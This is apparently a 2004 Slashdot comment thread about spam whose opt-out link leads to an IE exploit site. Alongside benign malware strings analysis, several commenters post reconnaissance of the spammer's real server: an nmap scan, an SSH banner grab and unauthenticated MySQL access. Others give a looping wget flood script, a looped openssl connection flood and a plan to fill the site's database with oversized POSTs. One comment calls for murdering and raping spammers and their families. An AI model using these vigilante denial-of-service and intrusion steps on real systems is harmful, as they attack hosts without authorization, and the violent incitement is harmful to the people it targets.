Spam Opt-out Link Triggers Malicious Code Attack

Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site, that when the user scrolls the page, triggers a drag-drop javascript exploit. Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings. As The Reg says "It comes as little surprise that this feature is been taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in questions points to www. xcelent.biz (As in The Reg story, space intentionally included) so even if you can't block the mail yet it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include "features" such as this in the near future."

Use your powers for good

[Mignon]

Why don't we non IE-users use the Slashdot effect for good? Let's all visit the evil site and soon it will be a steaming pile of rubble.

interesting ports on the spammer's site

[Indy1]

Starting nmap 3.70 ( http://www.insecure.org/nmap/ ) at 2004-09-22 09:54 MDT
Interesting ports on 61-218-79-53.HINET-IP.hinet.net (61.218.79.53):
(The 1651 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
135/tcp filtered msrpc
443/tcp open https
445/tcp filtered microsoft-ds
3306/tcp open mysql
6000/tcp open X11

Nmap run completed -- 1 IP address (1 host up) scanned in 54.453 seconds

Re:interesting ports on the spammer's site

[TCM]

$ telnet 61.218.79.53 22
Trying 61.218.79.53...
Connected to 61-218-79-53.HINET-IP.hinet.net.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.5p1

Hmm.. Isn't 3.5p1 vulnerable to some exploit? Not that I'm implying anything!

Re:interesting ports on the spammer's site

[caluml]

bash-2.05b$ mysql -h 61-218-79-53.HINET-IP.hinet.net
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 658 to server version: 3.23.54

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------+
| Database |
+-----------------+
| earth_bizzads |
| herbalmarketing |
| mysql |
+-----------------+
3 rows in set (0.45 sec)

mysql>

Re:interesting ports on the spammer's site

earth_bizzads
Interesting, one of the string literals in the downloaded binary is "www.earthlabs.biz/sockproxy/rec.php", a database of infected clients perhaps?

Javascript console

[saned]

Firefox's Javascript console reports many errors:

Error: unterminated string literal Source File: http://focusin.ads.targetnet.com//ad/id=dmitryivan ov&opt=hjj&rw=468&rh=60&cv=220&uid=673 475 Line: 3, Column: 17 Source Code: document.writeln('

Error: newPopup has no properties Source File: http://mediamgr.ugo.com/js.ng/Network=ugo&size=1x1 &adtype=over&affiliate=ultimate-guitar&suba=ultima te-guitar&channel=music&subchannel=tic&category=ti c&PT=ct&CR=ei&pez=tic Line: 11

Error: document.getElementById("clientcall").click is not a function Source File: http://www.xcelent.biz/o/ Line: 74

Error: event is not defined Source File: http://www.xcelent.biz/o/frame.html Line: 84

...and many more similar to this
-P@

Slightly OT-Malicious spam opt-outs and MYPOINTS

[CdBee]

I recenived an email from MyPoints asking me to activate an account set up on my Gmail address a few days ago, and hit the CAN-spam opt-out link (I hadn't signed up for it)

Since then I'm getting a LOT of spam, I received none prior. All have the same recipient name as the Mypoints mail and some other common characteristics, but none of the opt-out stuff. Thankfully, gmail is autofiltering them without any need for intervention, but I can't help but feel MyPoints are behind it.

Has anyone else had the same thing happen?

Quick .EXE Analysis

[terrencefw]

As one other poster pointed out, running 'strings' on the executable reveals itself it be 'xProxyBot'.

Some other strings give a few clues about what it does:

• Software\Microsoft\Windows\CurrentVersion\Run - It installs itself in the registry.
• Mozilla/4.0 (compatible) - It grabs stuff of the web and tries to look like IE in the logs.
• SYSTEM\CurrentControlSet\Control\SafeBoot - Tries to get started in safe mode too.

It installs itself in Software\Microsoft\Windows\CurrentVersion\Run as 'w32.exe'. I don't see it doing very much though. I've let it loose on a VMWare '98 session. No opened ports (unless it responds to portknocking), no attempts at outbound communication, maybe '98 is too old for it!

Can't we just deal with this already

[gelfling]

I like a good practical joke as much as the next person. Can we just track down one of these people, drag him/her outside chop them up with bolo knives hunt down their families, rape mutiliate and murder them set fire to their houses, kill their dogs and piss all over the corpses already?

I figure 10, 20 thousand of these losers tops and the problem will go away.

Re:Microsoft says "No Problem"

[bheerssen]

Yep, exactly right.

For the curious, here is an interesting post that describes the exploit at some length. Essentially, it uses an HTML 'dynsrc' attribute (proprietary Microsoft extension) to allow IE to download the executable, and javascript to use the 'shell:' protocol to execute it. It's not a particularly new flaw, but this is the slickest exploit of it I've seen.

And people say ICANN is worthless...

[miu]

By creating the .biz TLD they created a shyster scum ghetto I can easily ignore.

Thank you ICANN! :)

I block all .biz

[emptybody]

what, you dont have a .com?
get over it.

Fill his database

[caffeine_monkey]

It looks like he's not checking the field length of that "email addr" input before inserting it into the DB, so it should be a simple matter for someone to write a script to continuously loop through a POST to http://61.218.79.53/o/cgi-bin/removeme.cgi with a large amount of data in the field name "email". If a few people do this, his DB should fill up pretty quick.

Re:Even better - choose a link with graphics on.

I'm not the grandparent poster but this one will do the trick. It's unethical but we cant help but to get pissed off at assholes like these once in a while now do we? :P

#!/bin/sh
wget --mirror -erobots=off --user-agent=`mcookie` -np https://www.xcelent.biz/d/
find www.xcelent.biz/ -name *.jpg>urls
while [ true ]; do
for i in `cat urls`; do
wget --user-agent=`mcookie` -O tmp https://$i
rm tmp
sleep 1
done
done

Use SSL version for maximum effect

The brain-dead apache admin that put this box together made all the pages available over the SSL connection. So from your browser (preferably FireFox) use this link.

https://61.218.79.53/d/

Or if you have OpenSSL on your box (most *nix boxes do or you can download it from www.openssl.org) use this line in your favorite looped script:

openssl s_client -connect 61.218.79.53:443

This sets up an SSL connection. Even if they are using a HSM (Hardware Security Module) they cannot service more than 300-400 or so connections/sec with an HSM rated for 600 connections/sec. They aren't using an HSM, so it shouldn't take more than about 50-100 of these per second to fully tax the processor.

Re:devious

[interJ]

What patch? This vulnerability affects Win XP SP2 with all updates installed. See here for more info and a harmless demonstration.

This is a bug that has been known publicly for over a month, but apparently Microsoft have other priorities.